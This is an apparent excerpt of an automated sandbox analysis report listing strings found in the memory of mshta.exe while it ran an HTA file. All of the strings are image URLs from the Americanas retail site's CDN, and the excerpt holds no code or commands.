Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728237084.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-desk-1296x54-bd34177535b9.png
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-mobile-648x54-2362be2b92fb.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728237084.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.png
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.png&
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.pngI
Source: mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.pngOw
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_mob-5885530f6181.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.png
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.pngt
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2716901409.0000000009A5C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700261943.0000000009A5A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_mob-cf1beb995cdb.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727692959.0000000006E97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.png
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_mob-f70de84933f3.png
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747059165.0000000006E3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_desk-e41609a1df26.png
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749376863.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745043189.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766109182.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750683255.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_mob-26a210faf78c.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744022226.0000000006E98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727692959.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png
Source: mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.pngpv1
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_mob-f565c14907fb.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773947173.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/1-banners_home_mob-campanhas-home-300x450-9e
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726812852.0000000009360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A85F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/2-banners_home_mob-campanhas-home-300x450-5f
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 